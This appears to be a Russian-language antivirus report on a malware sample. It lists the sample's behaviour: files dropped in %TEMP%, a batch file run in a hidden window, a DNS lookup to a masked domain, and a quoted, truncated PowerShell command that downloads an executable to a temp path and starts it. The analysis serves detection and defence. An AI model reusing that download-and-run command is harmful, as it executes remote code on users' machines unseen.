Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $s1 как %temp%\tmp6032.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#close task#>function monik([string] $s1){(new-object system.net.webclient).downloadfile($s1,''%tmp%\tmp6032.exe'');<#asc info#>start-process ''%tmp%\tmp6032.exe''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1098309.cvr
- %TEMP%\tmp7308.bat
Сетевая активность
UDP
- DNS ASK ba###secure.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#close task#>function monik([string] $s1){(new-object system.net.webclient).downloadfile($s1,''%tmp%\tmp6032.exe'');<#asc info#>start-process ''%tmp%\tmp6032.exe''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp7308.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp7308.bat" "
